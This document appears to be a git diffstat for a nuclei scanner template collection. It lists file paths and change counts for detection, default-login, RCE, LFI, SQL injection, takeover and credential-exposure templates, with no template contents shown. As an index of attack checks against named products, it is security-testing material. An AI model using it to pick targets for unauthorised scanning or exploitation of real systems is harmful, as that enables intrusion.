nuclei-templates/Other/etl3100.yaml | 22 + .../Other/etouch-v2-sqli-7268.yaml | 22 + nuclei-templates/Other/etouch-v2-sqli.yaml | 25 - 
nuclei-templates/Other/etsy-access-token.yaml | 5 +- .../Other/event-debug-server-status.yaml | 5 +- nuclei-templates/Other/eventum-panel.yaml | 19 +- nuclei-templates/Other/evilginx.yaml | 7 +- nuclei-templates/Other/evilginx2-jarm.yaml | 5 +- nuclei-templates/Other/evlink-panel.yaml | 7 +- nuclei-templates/Other/evse-web-panel.yaml | 12 +- .../ewebs-arbitrary-file-reading-7270.yaml | 31 + .../Other/ewebs-arbitrary-file-reading.yaml | 26 - nuclei-templates/Other/ewm-manager-panel.yaml | 14 +- .../Other/ewww-image-optimizer.yaml | 2 +- .../exacqvision-default-credentials.yaml | 5 - .../Other/exacqvision-default-login-7277.yaml | 43 + .../Other/exacqvision-default-login.yaml | 43 - .../Other/exagrid-manager-panel.yaml | 16 +- nuclei-templates/Other/example-template.yaml | 8 +- nuclei-templates/Other/exit-notifier.yaml | 59 + .../Other/exolis-engage-panel.yaml | 13 +- .../experience_manager_cloud_service.yaml | 21 + .../Other/exploit-CVE-2022-1388.yaml | 75 + nuclei-templates/Other/exposed-adb.yaml | 10 +- .../Other/exposed-alps-spring-7283.yaml | 30 + .../Other/exposed-alps-spring.yaml | 31 - .../Other/exposed-authentication-asmx.yaml | 7 +- .../Other/exposed-bitkeeper-7291.yaml | 28 + nuclei-templates/Other/exposed-bitkeeper.yaml | 27 - ...exposed-bzr.yaml => exposed-bzr-7295.yaml} | 0 .../Other/exposed-darcs-7297.yaml | 24 + .../Other/exposed-darcs-7298.yaml | 23 - .../Other/exposed-docker-api-7299.yaml | 29 - .../Other/exposed-docker-api.yaml | 30 + nuclei-templates/Other/exposed-dockerd.yaml | 10 +- .../Other/exposed-file-upload-form.yaml | 6 +- .../Other/exposed-gitignore-7303.yaml | 35 + .../Other/exposed-gitignore-7304.yaml | 39 - ...309.yaml => exposed-glances-api-7308.yaml} | 0 .../exposed-jquery-file-upload-7315.yaml | 24 - .../Other/exposed-jquery-file-upload.yaml | 21 + .../Other/exposed-kafdrop-7316.yaml | 16 + nuclei-templates/Other/exposed-kafdrop.yaml | 19 - ...d-kibana.yaml => exposed-kibana-7320.yaml} | 0 ...l.yaml => 
exposed-mysql-initial-7322.yaml} | 0 .../Other/exposed-nomad-7329.yaml | 30 + nuclei-templates/Other/exposed-nomad.yaml | 40 - nuclei-templates/Other/exposed-pii.yaml | 140 - .../Other/exposed-prometheus-log-7333.yaml | 24 - .../Other/exposed-prometheus-log-7334.yaml | 24 + .../Other/exposed-redis-7338.yaml | 23 + nuclei-templates/Other/exposed-redis.yaml | 27 - ...now.yaml => exposed-service-now-7342.yaml} | 0 .../Other/exposed-sharepoint-list.yaml | 6 +- .../Other/exposed-sqlite-manager.yaml | 6 +- ...exposed-svn.yaml => exposed-svn-7351.yaml} | 0 ...d-vscode.yaml => exposed-vscode-7357.yaml} | 0 .../Other/exposed-zookeeper-7362.yaml | 22 + .../Other/express-default-page.yaml | 5 +- nuclei-templates/Other/express-lfr.yaml | 52 +- .../Other/express-stack-trace.yaml | 7 +- .../Other/external-service-interaction.yaml | 15 +- ...tract-urls.yaml => extract-urls-7368.yaml} | 0 .../Other/extreme-netconfig-ui-7372.yaml | 60 +- nuclei-templates/Other/extron-cms-panel.yaml | 14 +- ...no-lfd.yaml => eyelock-nano-lfd-7373.yaml} | 0 .../Other/eyesofnetwork-detect.yaml | 6 +- .../Other/eyou-email-rce-7382.yaml | 28 + nuclei-templates/Other/eyou-email-rce.yaml | 24 - nuclei-templates/Other/ez-publish-panel.yaml | 10 +- .../Other/f-secure-policy-manager-7560.yaml | 23 - .../Other/f-secure-policy-manager-7564.yaml | 20 + .../Other/facebook-api-token.yaml | 6 +- ...t-id.yaml => facebook-client-id-7384.yaml} | 0 .../Other/facebook-for-woocommerce.yaml | 4 +- nuclei-templates/Other/facebook-page.yaml | 9 +- .../Other/facturascripts-installer.yaml | 5 +- ...l => fanruan-channel-deserialization.yaml} | 0 ...detect.yaml => fanruanoa-detect-7391.yaml} | 0 ...ct.yaml => fanruanoa2012-detect-7388.yaml} | 0 ...aml => fanruanoa2012-disclosure-7389.yaml} | 0 nuclei-templates/Other/faraday-login.yaml | 3 +- nuclei-templates/Other/fastAPI-1.yaml | 25 + nuclei-templates/Other/fastAPI-2.yaml | 25 + nuclei-templates/Other/fastAPI-3.yaml | 25 + nuclei-templates/Other/fastAPI-4.yaml | 25 + 
nuclei-templates/Other/fastAPI-5.yaml | 25 + nuclei-templates/Other/fastcgi-echo.yaml | 10 +- ...rce.yaml => fastjson-1-2-24-rce-7400.yaml} | 0 ...rce.yaml => fastjson-1-2-41-rce-7404.yaml} | 0 ...rce.yaml => fastjson-1-2-42-rce-7408.yaml} | 0 ...rce.yaml => fastjson-1-2-43-rce-7411.yaml} | 0 ...rce.yaml => fastjson-1-2-47-rce-7415.yaml} | 0 .../Other/fastjson-1-2-67-rce-7423.yaml | 40 + .../Other/fastjson-1-2-67-rce.yaml | 33 - ...rce.yaml => fastjson-1-2-68-rce-7425.yaml} | 0 nuclei-templates/Other/fastjson-version.yaml | 9 +- nuclei-templates/Other/fastly-api-token.yaml | 5 +- .../Other/fastly-takeover-7429.yaml | 18 + nuclei-templates/Other/fastly-takeover.yaml | 18 - .../fastpanel-hosting-control-panel.yaml | 9 +- .../Other/fatpipe-auth-bypass.yaml | 5 - ...436.yaml => fatpipe-ipvpn-panel-7435.yaml} | 0 .../favicon-by-realfavicongenerator.yaml | 2 +- nuclei-templates/Other/favicon-detect.yaml | 1192 +- .../Other/favicon-detection-7442.yaml | 573 +- nuclei-templates/Other/fb-access-token.yaml | 6 +- nuclei-templates/Other/fcm-api-key.yaml | 5 +- ...s-xss.yaml => feedwordpress-xss-7459.yaml} | 0 .../Other/feifeicms-lfr-7462.yaml | 33 + .../Other/feifeicms-lfr-7465.yaml | 29 - nuclei-templates/Other/ffserver-status.yaml | 7 +- .../Other/fhem-6-unauthenticated-lfi.yaml | 4 - .../Other/figma-access-token.yaml | 5 +- nuclei-templates/Other/file-scheme-7467.yaml | 16 + nuclei-templates/Other/file-scheme.yaml | 15 - .../Other/filebrowser-login-panel.yaml | 8 +- nuclei-templates/Other/filezilla-7471.yaml | 25 + nuclei-templates/Other/filezilla.yaml | 31 - .../Other/fine-report-v9-file-upload.yaml | 10 +- nuclei-templates/Other/finecms-sqli-7475.yaml | 9 +- .../Other/finereport-path-traversal-7478.yaml | 31 + .../Other/finereport-path-traversal.yaml | 27 - nuclei-templates/Other/finger-detect.yaml | 10 +- ...fingerprinthub-web-fingerprints-7480.yaml} | 0 .../Other/finicity-api-token.yaml | 5 +- .../Other/finicity-client-secret.yaml | 5 +- 
.../Other/finicity-clientsecret.yaml | 5 +- nuclei-templates/Other/finicity-token.yaml | 5 +- .../Other/finnhub-access-token.yaml | 5 +- .../Other/finnhub-accesstoken.yaml | 5 +- nuclei-templates/Other/fiori-launchpad.yaml | 12 +- ...on.yaml => fiorilaunchpad-logon-7484.yaml} | 0 ...aml => firebase-config-exposure-7486.yaml} | 0 .../Other/firebase-database-7489.yaml | 17 - .../Other/firebase-database-extractor.yaml | 7 +- nuclei-templates/Other/firebase-database.yaml | 17 + .../Other/firebase-debug-log.yaml | 5 +- ...ct-7493.yaml => firebase-detect-7496.yaml} | 0 .../Other/firebase-urls-7498.yaml | 23 + nuclei-templates/Other/firebase-urls.yaml | 27 - ...fireware-xtm-user-authentication-7501.yaml | 23 - .../fireware-xtm-user-authentication.yaml | 20 + .../Other/flahscookie-superadmin-panel.yaml | 9 +- nuclei-templates/Other/flamingo.yaml | 2 +- .../Other/flask-werkzeug-debug.yaml | 7 +- nuclei-templates/Other/flatpress-xss.yaml | 10 +- .../Other/flexbe-takeover-7506.yaml | 27 + nuclei-templates/Other/flexbe-takeover.yaml | 23 - nuclei-templates/Other/flexnet_publisher.yaml | 20 + .../Other/flightpath-panel-7507.yaml | 25 + nuclei-templates/Other/flightpath-panel.yaml | 31 - ...exposure.yaml => flink-exposure-7511.yaml} | 0 nuclei-templates/Other/flip-cms-panel.yaml | 8 +- .../Other/flir-default-login-7513.yaml | 35 + .../Other/flir-default-login.yaml | 42 - .../Other/flir-path-traversal-7521.yaml | 25 - .../Other/flir-path-traversal-7522.yaml | 21 + nuclei-templates/Other/floating-contact.yaml | 59 + .../Other/flow-flow-social-stream-xss.yaml | 5 - nuclei-templates/Other/flowci-detection.yaml | 3 - nuclei-templates/Other/flowci-panel.yaml | 11 +- nuclei-templates/Other/fluentform.yaml | 4 +- .../Other/flureedb-admin-console.yaml | 9 +- .../Other/flyway-spring-boot.yaml | 2 - nuclei-templates/Other/flywheel-takeover.yaml | 18 + nuclei-templates/Other/flywheel_takeover.yaml | 19 - nuclei-templates/Other/font-awesome.yaml | 2 +- 
nuclei-templates/Other/footprints-panel.yaml | 9 +- .../Other/force-regenerate-thumbnails.yaml | 2 +- nuclei-templates/Other/formidable.yaml | 4 +- nuclei-templates/Other/forminator.yaml | 2 +- nuclei-templates/Other/fortiadc-panel.yaml | 12 +- nuclei-templates/Other/fortiap-panel.yaml | 12 +- .../Other/fortiauthenticator-detect.yaml | 8 +- .../Other/forticlientems-panel.yaml | 4 +- ...l-panel.yaml => fortimail-panel-7531.yaml} | 0 nuclei-templates/Other/fortinet-detect.yaml | 4 - .../Other/fortinet-fortiddos-panel.yaml | 8 +- .../Other/fortinet-fortigate-panel-7535.yaml | 16 + .../Other/fortinet-fortigate-panel.yaml | 20 - .../Other/fortinet-fortimanager-panel.yaml | 6 +- .../Other/fortinet-fortinac-panel.yaml | 8 +- .../Other/fortios-management-panel.yaml | 13 +- .../Other/fortios-open-redirect.yaml | 4 - nuclei-templates/Other/fortios-panel.yaml | 12 +- nuclei-templates/Other/fortiportal.yaml | 20 + .../Other/fortitester-login-panel.yaml | 13 +- .../Other/fortiweb-panel-7537.yaml | 25 + nuclei-templates/Other/fortiweb-panel.yaml | 25 - nuclei-templates/Other/fortiwlm-panel.yaml | 6 +- nuclei-templates/Other/framework.yaml | 24 + nuclei-templates/Other/freeipa-panel.yaml | 8 +- .../{2755030215.yaml => freelancer.yaml} | 0 .../Other/freepbx-administration-panel.yaml | 14 +- .../Other/freshdesk-takeover-7540.yaml | 26 + .../Other/freshdesk-takeover.yaml | 22 - nuclei-templates/Other/friendica-panel.yaml | 8 +- .../Other/front-page-misconfig-7546.yaml | 25 + .../Other/front-page-misconfig.yaml | 22 - .../Other/frontify-takeover-7544.yaml | 17 + nuclei-templates/Other/frontify-takeover.yaml | 18 - .../Other/froxlor-database-backup.yaml | 12 +- .../Other/froxlor-detect-7551.yaml | 24 + nuclei-templates/Other/froxlor-detect.yaml | 24 - .../Other/froxlor-management-panel.yaml | 13 +- nuclei-templates/Other/froxlor-xss.yaml | 13 +- nuclei-templates/Other/froxlor.yaml | 20 + .../Other/frp-default-login-7559.yaml | 34 + nuclei-templates/Other/frp-default-login.yaml | 35 - 
...ver-listDir.yaml => frserver-listdir.yaml} | 0 nuclei-templates/Other/ftm-manager-panel.yaml | 16 +- .../Other/ftp-anonymous-login.yaml | 17 +- .../Other/ftp-default-credentials.yaml | 30 + nuclei-templates/Other/ftp-default-creds.yaml | 22 - .../Other/ftp-weak-credentials-7569.yaml | 37 + .../Other/ftp-weak-credentials.yaml | 35 - nuclei-templates/Other/ftpconfig-7565.yaml | 32 + nuclei-templates/Other/ftpconfig.yaml | 25 - .../Other/fuelcms-default-login-7572.yaml | 54 + .../Other/fuelcms-default-login.yaml | 62 - nuclei-templates/Other/fuelcms-panel.yaml | 13 +- .../Other/fuji-xerox-printer-detect.yaml | 9 +- nuclei-templates/Other/fumengyun-sqli.yaml | 54 + .../Other/fusionauth-admin-panel.yaml | 8 +- ...uzzing-xss-get-params-html-injection.yaml} | 0 ...t-params-javascript-context-injection.yaml | 58 +- nuclei-templates/Other/g0.yaml | 20 + .../Other/ga-google-analytics.yaml | 4 +- .../Other/ganglia-cluster-dashboard.yaml | 10 +- ...aml => ganglia-xml-grid-monitor-7574.yaml} | 0 .../Other/{2848712183.yaml => ganglia.yaml} | 0 nuclei-templates/Other/gargoyle-router.yaml | 9 +- .../Other/gcloud-access-token.yaml | 6 +- .../Other/gcloud-config-default.yaml | 8 +- .../Other/gcloud-credentials.yaml | 6 +- .../Other/gemfury-takeover-7578.yaml | 15 + nuclei-templates/Other/gemfury-takeover.yaml | 18 - .../Other/general-tokens-7583.yaml | 45 - nuclei-templates/Other/general-tokens.yaml | 46 + nuclei-templates/Other/generic-c2-jarm.yaml | 5 +- nuclei-templates/Other/generic-env.yaml | 50 +- nuclei-templates/Other/generic-j2ee-lfi.yaml | 36 +- .../Other/generic-linux-lfi-7589.yaml | 45 + .../Other/generic-path-traversal.yaml | 32 +- nuclei-templates/Other/generic-rfi.yaml | 34 - nuclei-templates/Other/generic-ssrf.yaml | 2 +- ...lfi.yaml => generic-windows-lfi-7591.yaml} | 0 .../Other/geniusocean-installer.yaml | 5 +- nuclei-templates/Other/genweb-plus-panel.yaml | 8 +- .../Other/geo-webserver-detect.yaml | 7 +- .../Other/geoserver-default-login.yaml | 10 +- 
.../Other/geoserver-login-panel.yaml | 15 +- .../geovision-geowebserver-lfi-7596.yaml | 32 + .../Other/geovision-geowebserver-lfi.yaml | 30 - ...e-detect-7604.yaml => gespage-detect.yaml} | 0 ...age-panel.yaml => gespage-panel-7606.yaml} | 0 .../Other/get-access-token-json.yaml | 6 +- .../Other/getresponse-takeover-7610.yaml | 15 + .../Other/getresponse-takeover.yaml | 18 - ...ct.yaml => getsimple-cms-detect-7614.yaml} | 0 .../Other/getsimple-cms-detector-7612.yaml | 22 + .../Other/getsimple-installation-7618.yaml | 4 - ...le-leakage.yaml => getsimple-leakage.yaml} | 0 nuclei-templates/Other/ghost-admin-panel.yaml | 2 - .../Other/ghost-takeover-7620.yaml | 20 + .../Other/ghost-takeover-7622.yaml | 24 - .../Other/gira-homeserver-homepage.yaml | 9 +- nuclei-templates/Other/git-config-7633.yaml | 31 + .../git-config-nginxoffbyslash-7632.yaml | 38 + .../Other/git-config-nginxoffbyslash.yaml | 28 - nuclei-templates/Other/git-config.yaml | 29 - ...entials.yaml => git-credentials-7643.yaml} | 0 .../git-credentials-disclosure-7640.yaml | 32 - .../git-credentials-disclosure-7641.yaml | 27 + nuclei-templates/Other/git-exposure.yaml | 6 +- nuclei-templates/Other/git-logs-exposure.yaml | 8 +- nuclei-templates/Other/git-mailmap-7710.yaml | 38 - nuclei-templates/Other/git-mailmap.yaml | 38 + .../Other/git-repository-browser.yaml | 15 +- nuclei-templates/Other/gitblit-panel.yaml | 13 +- nuclei-templates/Other/gitbook-detect.yaml | 2 +- .../Other/gitbook-takeover-7626.yaml | 31 + nuclei-templates/Other/gitbook-takeover.yaml | 19 - nuclei-templates/Other/gitea-installer.yaml | 5 +- nuclei-templates/Other/gitea-login-7646.yaml | 5 - nuclei-templates/Other/gitea-login-check.yaml | 5 +- .../Other/gitea-public-signup.yaml | 6 +- nuclei-templates/Other/github-app-token.yaml | 8 +- nuclei-templates/Other/github-debug.yaml | 5 +- .../Other/github-enterprise-detect.yaml | 2 +- .../Other/github-login-check.yaml | 4 +- .../Other/github-oauth-token.yaml | 4 +- 
.../Other/github-outdated-key.yaml | 5 +- .../Other/github-page-config.yaml | 4 +- ...n.yaml => github-personal-token-7657.yaml} | 0 .../Other/github-refresh-token.yaml | 4 +- .../Other/github-takeover-7661.yaml | 24 - .../Other/github-takeover-7662.yaml | 25 + .../github-workflows-disclosure-7665.yaml | 54 - .../Other/github-workflows-disclosure.yaml | 51 + nuclei-templates/Other/github.yaml | 41 +- .../Other/gitlab-api-user-enum-7668.yaml | 35 + .../Other/gitlab-api-user-enum.yaml | 39 - .../Other/gitlab-detect-7670.yaml | 25 - .../Other/gitlab-detect-7672.yaml | 25 + .../Other/gitlab-login-check-self-hosted.yaml | 5 +- .../Other/gitlab-personal-accesstoken.yaml | 5 +- .../Other/gitlab-pipeline-triggertoken.yaml | 5 +- ...pos.yaml => gitlab-public-repos-7680.yaml} | 0 .../Other/gitlab-public-signup.yaml | 10 +- .../Other/gitlab-public-snippets-7686.yaml | 33 - .../Other/gitlab-public-snippets-7688.yaml | 32 + nuclei-templates/Other/gitlab-rce-7693.yaml | 55 + nuclei-templates/Other/gitlab-rce.yaml | 63 - .../Other/gitlab-runner-regtoken.yaml | 5 +- .../gitlab-uninitialized-password-7695.yaml | 38 + .../Other/gitlab-uninitialized-password.yaml | 47 - .../Other/gitlab-user-enum-7700.yaml | 30 + nuclei-templates/Other/gitlab-user-enum.yaml | 37 - .../Other/gitlab-user-open-api-7702.yaml | 39 + .../Other/gitlab-weak-login-7705.yaml | 56 - .../Other/gitlab-weak-login-7706.yaml | 51 + nuclei-templates/Other/gitlab-workflow.yaml | 2 + ...sure.yaml => gitlist-disclosure-7709.yaml} | 0 nuclei-templates/Other/gitter-token.yaml | 5 +- .../Other/global-domains-xss.yaml | 3 +- .../Other/global-traffic-statistics.yaml | 5 +- .../Other/globalprotect-panel-7721.yaml | 21 + .../Other/globalprotect-panel.yaml | 15 - nuclei-templates/Other/gloo-unauth.yaml | 5 - nuclei-templates/Other/glowroot-panel.yaml | 5 +- .../Other/glpi-9.3.3-sql-injection.yaml | 30 + .../Other/glpi-authentication-7727.yaml | 25 + .../Other/glpi-authentication.yaml | 24 - 
.../Other/glpi-default-credential.yaml | 7 - .../Other/glpi-default-login-7731.yaml | 18 +- ....yaml => glpi-directory-listing-7734.yaml} | 0 .../Other/glpi-fusioninventory-misconfig.yaml | 2 - nuclei-templates/Other/glpi-login-1.yaml | 22 + nuclei-templates/Other/glpi-login-2.yaml | 22 + .../{glpi-login.yaml => glpi-login-7736.yaml} | 0 nuclei-templates/Other/glpi-status-page.yaml | 5 +- ...ml => glpi-telemetry-disclosure-7738.yaml} | 0 ...ting.yaml => glpidirectorylisting(1).yaml} | 0 .../Other/gnu-inetutils-ftpd-detect.yaml | 59 +- nuclei-templates/Other/gnu-mailman.yaml | 10 +- nuclei-templates/Other/gnuboard-sms-xss.yaml | 11 +- nuclei-templates/Other/gnuboard5-rxss.yaml | 11 +- nuclei-templates/Other/gnuboard5-xss.yaml | 11 +- nuclei-templates/Other/gnuboard5.yaml | 22 + .../Other/go-anywhere-client-7743.yaml | 21 - .../Other/go-anywhere-client.yaml | 21 + nuclei-templates/Other/go-mod-disclosure.yaml | 5 +- .../Other/goanywhere-mft-log4j-rce.yaml | 43 +- .../Other/goanywhere-mft-login.yaml | 15 +- .../Other/gocd-cruise-configuration-7748.yaml | 31 + .../Other/gocd-cruise-configuration.yaml | 27 - nuclei-templates/Other/gocd-login-7751.yaml | 24 + nuclei-templates/Other/gocd-login-7753.yaml | 24 - .../Other/gogs-install-exposure-7755.yaml | 25 - .../Other/gogs-install-exposure.yaml | 21 + nuclei-templates/Other/gogs-panel.yaml | 14 +- nuclei-templates/Other/goip-1-lfi-7764.yaml | 26 + nuclei-templates/Other/goip-1-lfi.yaml | 31 - .../Other/goip-default-login.yaml | 16 +- ...-metrics.yaml => golang-metrics-7765.yaml} | 0 nuclei-templates/Other/golangci-config.yaml | 15 +- nuclei-templates/Other/goliath-detect.yaml | 5 +- nuclei-templates/Other/goodjob-dashboard.yaml | 4 +- .../google-analytics-dashboard-for-wp.yaml | 4 +- .../Other/google-analytics-for-wordpress.yaml | 2 +- ...-api-key.yaml => google-api-key-7770.yaml} | 0 .../Other/google-api-private-key.yaml | 6 +- nuclei-templates/Other/google-clientid.yaml | 5 +- .../Other/google-floc-disabled-7784.yaml | 
20 + .../Other/google-floc-disabled.yaml | 17 - .../Other/google-frontend-httpserver.yaml | 5 +- .../Other/google-listings-and-ads.yaml | 4 +- .../Other/google-oauth-clientsecret.yaml | 5 +- .../Other/google-safebrowsing.yaml | 10 +- .../Other/google-services-json.yaml | 6 +- nuclei-templates/Other/google-site-kit.yaml | 2 +- .../Other/google-sitemap-generator.yaml | 4 +- .../Other/google-storage-7788.yaml | 18 + .../Other/google-storage-bucket.yaml | 3 +- nuclei-templates/Other/google-storage.yaml | 18 - ...aces.yaml => google-textsearchplaces.yaml} | 0 nuclei-templates/Other/gopher-detect.yaml | 12 +- nuclei-templates/Other/gopher-detection.yaml | 5 +- ...3.yaml => gophish-default-login-7792.yaml} | 0 .../Other/gophish-login-7796.yaml | 23 + nuclei-templates/Other/gophish-login.yaml | 23 - nuclei-templates/Other/gotify-panel.yaml | 10 +- nuclei-templates/Other/gozi-malware-c2.yaml | 5 +- nuclei-templates/Other/gpc-json.yaml | 9 +- .../Other/gradio-CVE-2024-1183.yaml | 36 - .../Other/gradle-cache-node-detect.yaml | 7 +- .../gradle-enterprise-build-cache-detect.yaml | 3 - ...yaml => gradle-enterprise-panel-7799.yaml} | 0 nuclei-templates/Other/gradle-libs.yaml | 8 +- .../Other/grafana-default-login-7804.yaml | 42 + .../Other/grafana-default-login.yaml | 48 - .../Other/grafana-detect-7807.yaml | 23 - .../Other/grafana-detect-7808.yaml | 23 + nuclei-templates/Other/grafana-file-read.yaml | 36 + .../Other/grafana-login-check.yaml | 5 +- ...6.yaml => grafana-public-signup-7814.yaml} | 0 nuclei-templates/Other/grafana-workflow.yaml | 8 +- ...> grails-database-admin-console-7819.yaml} | 0 ...randstream-device-configuration-7823.yaml} | 0 nuclei-templates/Other/graphite-browser.yaml | 3 +- .../Other/graphql-alias-batching-7826.yaml | 55 + .../Other/graphql-alias-batching.yaml | 41 - .../Other/graphql-array-batching-7828.yaml | 24 +- .../Other/graphql-detect-7830.yaml | 158 - .../Other/graphql-detect-7831.yaml | 158 + .../Other/graphql-field-suggestion-7834.yaml | 11 +- 
.../Other/graphql-get-method-7836.yaml | 34 + .../Other/graphql-get-method.yaml | 32 - .../Other/graphql-playground.yaml | 5 +- nuclei-templates/Other/graphql.yaml | 12 +- nuclei-templates/Other/grat2-c2-jarm.yaml | 5 +- ...-detect.yaml => grav-cms-detect-7842.yaml} | 0 nuclei-templates/Other/gravatar.yaml | 41 +- .../Other/graylog-api-browser-7846.yaml | 22 + .../Other/graylog-api-browser.yaml | 26 - nuclei-templates/Other/graylog-log4j.yaml | 40 +- nuclei-templates/Other/graylog-panel.yaml | 4 +- nuclei-templates/Other/greenbone-panel.yaml | 8 +- .../Other/grimag-open-redirect.yaml | 2 +- nuclei-templates/Other/group-ib-panel.yaml | 12 +- .../Other/groupoffice-lfi-7851.yaml | 26 + nuclei-templates/Other/groupoffice-lfi.yaml | 28 - ...sure.yaml => gruntfile-exposure-7852.yaml} | 0 nuclei-templates/Other/gryphon-login.yaml | 16 +- nuclei-templates/Other/gsoap-lfi-7855.yaml | 10 +- .../Other/gt-ac2900-login(1).yaml | 23 + nuclei-templates/Other/gtranslate.yaml | 2 +- .../Other/guacamole-default-login-7858.yaml | 46 + .../Other/guacamole-default-login-7861.yaml | 44 - nuclei-templates/Other/guard-config.yaml | 7 +- ...-detect.yaml => gunicorn-detect-7863.yaml} | 0 nuclei-templates/Other/gutenberg.yaml | 2 +- nuclei-templates/Other/gyra-master-admin.yaml | 9 +- .../Other/h2console-panel-7866.yaml | 24 - nuclei-templates/Other/h2console-panel.yaml | 20 + ...nly-nuclei.yaml => h2csmuggle-nuclei.yaml} | 0 ...h3c-imc-rce.yaml => h3c-imc-rce-7870.yaml} | 0 ...pass.yaml => h3c-secpath-loginbypass.yaml} | 0 nuclei-templates/Other/hack5-cloud-c2.yaml | 6 +- ...xposure.yaml => hadoop-exposure-7872.yaml} | 0 ...op-unauth.yaml => hadoop-unauth-7875.yaml} | 0 nuclei-templates/Other/hadoop-unauth-rce.yaml | 14 +- .../Other/haivision-gateway-panel.yaml | 6 +- .../Other/haivision-media-platform-panel.yaml | 6 +- .../Other/hangfire-dashboard.yaml | 13 +- nuclei-templates/Other/hanming-lfr-7879.yaml | 7 +- nuclei-templates/Other/hanta-rce.yaml | 4 +- 
nuclei-templates/Other/hanwang-detect.yaml | 8 +- .../Other/happy-elementor-addons.yaml | 2 +- .../Other/haproxy-exporter-metrics.yaml | 7 +- .../Other/haproxy-status-7883.yaml | 21 + nuclei-templates/Other/haproxy-status.yaml | 23 - .../Other/harbor-detect-7886.yaml | 4 - nuclei-templates/Other/harbor-panel.yaml | 14 +- .../Other/hashicorp-boundary-detect.yaml | 6 +- .../Other/hashicorp-consul-agent.yaml | 19 +- .../Other/hashicorp-consul-rce-7891.yaml | 33 + .../Other/hashicorp-consul-rce-7894.yaml | 32 - .../Other/hashicorp-consul-version.yaml | 4 - .../Other/hashicorp-consul-webgui-7898.yaml | 37 - .../Other/hashicorp-consul-webgui.yaml | 39 + .../Other/hasura-graphql-ssrf-7903.yaml | 45 - .../Other/hasura-graphql-ssrf-7905.yaml | 42 + .../Other/hatenablog-takeover.yaml | 7 +- nuclei-templates/Other/havoc-c2-jarm.yaml | 5 +- nuclei-templates/Other/havoc-c2.yaml | 5 +- nuclei-templates/Other/hb-audio-lfi-7911.yaml | 37 + nuclei-templates/Other/hb-audio-lfi.yaml | 24 - .../Other/hcpanywhere-detect.yaml | 2 +- .../Other/header-and-footer-scripts.yaml | 6 +- .../header-blind-time-sql-injection.yaml | 57 + .../Other/header-footer-code-manager.yaml | 2 +- .../Other/header-footer-elementor.yaml | 2 +- nuclei-templates/Other/header-footer.yaml | 2 +- nuclei-templates/Other/header_sqli.yaml | 4 +- .../Other/headless-open-redirect.yaml | 199 +- .../Other/health-check-lfi-7922.yaml | 7 +- nuclei-templates/Other/health-check.yaml | 2 +- .../Other/healthchecks-ui-exposure.yaml | 6 +- nuclei-templates/Other/hello-dolly.yaml | 2 +- ...7925.yaml => helpjuice-takeover-7927.yaml} | 0 .../Other/helprace-takeover-7931.yaml | 20 + nuclei-templates/Other/helprace-takeover.yaml | 17 - nuclei-templates/Other/heroku-key.yaml | 5 +- nuclei-templates/Other/heroku-takeover.yaml | 3 - nuclei-templates/Other/hestia-panel.yaml | 10 +- .../Other/hetzner-cloud-detect.yaml | 5 +- nuclei-templates/Other/heuristic-scan.yaml | 14 +- nuclei-templates/Other/hfs-exposure.yaml | 5 +- 
nuclei-templates/Other/hg255s.yaml | 20 + nuclei-templates/Other/hg532e.yaml | 20 + nuclei-templates/Other/hiboss-rce-7948.yaml | 25 + nuclei-templates/Other/hiboss-rce-7949.yaml | 31 - .../hide-security-enhancer-lfi-7952.yaml | 23 + .../Other/hide-security-enhancer-lfi.yaml | 35 - .../Other/highmail-admin-panel.yaml | 17 +- nuclei-templates/Other/hikvision-detect.yaml | 8 +- .../Other/hikvision-detection-1.yaml | 21 + .../Other/hikvision-detection-7955.yaml | 21 + .../Other/hikvision-detection.yaml | 25 - ...eak.yaml => hikvision-info-leak-7958.yaml} | 0 .../Other/hivemanager-login-panel-7966.yaml | 19 - .../Other/hivemanager-login-panel.yaml | 20 + nuclei-templates/Other/hivequeue-agent.yaml | 5 +- ...yaml => hjtcloud-arbitrary-file-read.yaml} | 0 ...jtcloud-rest-arbitrary-file-read-7976.yaml | 36 + .../hjtcloud-rest-arbitrary-file-read.yaml | 34 - ...l-7978.yaml => hmc-hybris-panel-7977.yaml} | 0 .../Other/home-assistant-7981.yaml | 1 - .../Other/home-assistant-panel.yaml | 6 +- .../homeautomation-v3-openredirect-7982.yaml | 20 - .../Other/homeautomation-v3-openredirect.yaml | 16 + nuclei-templates/Other/homebridge-panel.yaml | 5 +- nuclei-templates/Other/homematic-panel.yaml | 18 +- nuclei-templates/Other/homer-panel.yaml | 5 +- .../Other/homeworks-illumination.yaml | 5 +- .../Other/{3867691789.yaml => honeypot.yaml} | 0 .../honeywell-building-control-7987.yaml | 20 + .../Other/honeywell-building-control.yaml | 24 - .../Other/honeywell-scada-config.yaml | 4 +- .../Other/honeywell-web-controller-7995.yaml | 23 + .../Other/honeywell-web-controller.yaml | 24 - .../Other/honeywell-xl-web-controller.yaml | 9 +- .../Other/hongdian-default-login-7998.yaml | 48 - .../Other/hongdian-default-login.yaml | 41 + nuclei-templates/Other/hookbot-rat.yaml | 5 +- nuclei-templates/Other/horde-login-panel.yaml | 11 +- .../Other/horde-webmail-login.yaml | 11 +- .../Other/hospital-management-panel.yaml | 14 +- .../Other/hospital-management-xss.yaml | 10 +- 
.../Other/hospital-management-xss2.yaml | 10 +- .../Other/host-header-auth-bypass.yaml | 4 - ...soning.yaml => host-header-poisoning.yaml} | 0 .../Other/hp-blade-admin-detect-8005.yaml | 24 + .../Other/hp-blade-admin-detect.yaml | 24 - .../hp-color-laserjet-4700-webserver.yaml | 6 +- .../hp-color-laserjet-cp4025-webserver.yaml | 6 +- .../hp-color-laserjet-cp4525-webserver.yaml | 6 +- .../hp-color-laserjet-cp5225n-webserver.yaml | 6 +- .../hp-color-laserjet-cp5520-webserver.yaml | 6 +- .../Other/hp-color-laserjet-detect-8006.yaml | 44 - .../Other/hp-color-laserjet-detect.yaml | 31 + .../hp-color-laserjet-m553-webserver.yaml | 6 +- .../hp-color-laserjet-m652-webserver.yaml | 6 +- .../hp-color-laserjet-m653-webserver.yaml | 6 +- .../hp-color-laserjet-mfp-m577-webserver.yaml | 6 +- .../Other/hp-designjet-z5200-webserver.yaml | 6 +- ...9.yaml => hp-device-info-detect-8008.yaml} | 0 .../{hp-ilo-5-8021.yaml => hp-ilo-5.yaml} | 0 ...=> hp-ilo-serial-key-disclosure-8023.yaml} | 0 .../Other/hp-laserjet-600-m602-webserver.yaml | 6 +- .../Other/hp-laserjet-9040-webserver.yaml | 6 +- .../Other/hp-laserjet-detect-8028.yaml | 22 - .../Other/hp-laserjet-detect.yaml | 21 + 